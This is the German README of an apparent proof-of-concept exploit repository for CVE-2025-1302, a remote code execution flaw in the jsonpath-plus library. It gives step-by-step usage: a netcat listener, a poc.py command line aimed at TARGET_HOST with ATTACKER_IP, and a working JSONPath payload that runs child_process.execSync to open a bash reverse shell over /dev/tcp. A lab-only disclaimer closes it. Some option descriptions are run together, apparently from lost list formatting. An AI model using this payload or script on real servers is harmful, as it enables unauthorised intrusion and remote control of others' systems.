
PoC-Exploit und Demo eines verwundbaren Servers für CVE-2025-1302 in jsonpath-plus.
Name des PoC-Skripts: poc.py
Ein Proof-of-Concept-Exploit-Skript für CVE-2025-1302, das eine RCE-Sicherheitslücke in der jsonpath-plus-Bibliothek ausnutzt. Wenn es gegen einen verwundbaren Dienst-Endpunkt ausgeführt wird, versucht das Skript, über eine JSONPath-Nutzlast eine entfernte Codeausführung auszulösen und eine Reverse-Shell zum Angreifer aufzubauen.
--method oder --no-fallback.{ip} und {port}.tqdm-Fortschrittsbalken an.--output in eine JSON-Datei gespeichert werden.Klonen Sie dieses Repository:
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
Installieren Sie die Abhängigkeiten (erfordert Python 3.6+):
pip install -r requirements.txt
Starten Sie einen Listener auf Ihrem Angreifer-Rechner (Port bei Bedarf anpassen):
nc -lvnp 9999
Führen Sie das PoC aus:
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
--payload-file: Datei mit einem JSONPath-Nutzlast-Eintrag pro Zeile. Verwenden Sie die Platzhalter {ip} und {port}.--delay: Sekunden, die vor dem Senden der Nutzlasten gewartet werden sollen (zeigt Countdown an).--method: Erzwingt POST, GET oder AUTO (Standard).--no-fallback: Kurzbefehl, um einen GET-Wiederholungsversuch zu überspringen (entspricht --method POST).--output: Pfad zur JSON-Protokolldatei der Versuche.$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
Verwenden Sie dieses Skript nur in kontrollierten Laborumgebungen gegen Systeme, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Missbrauch kann illegal und unethisch sein.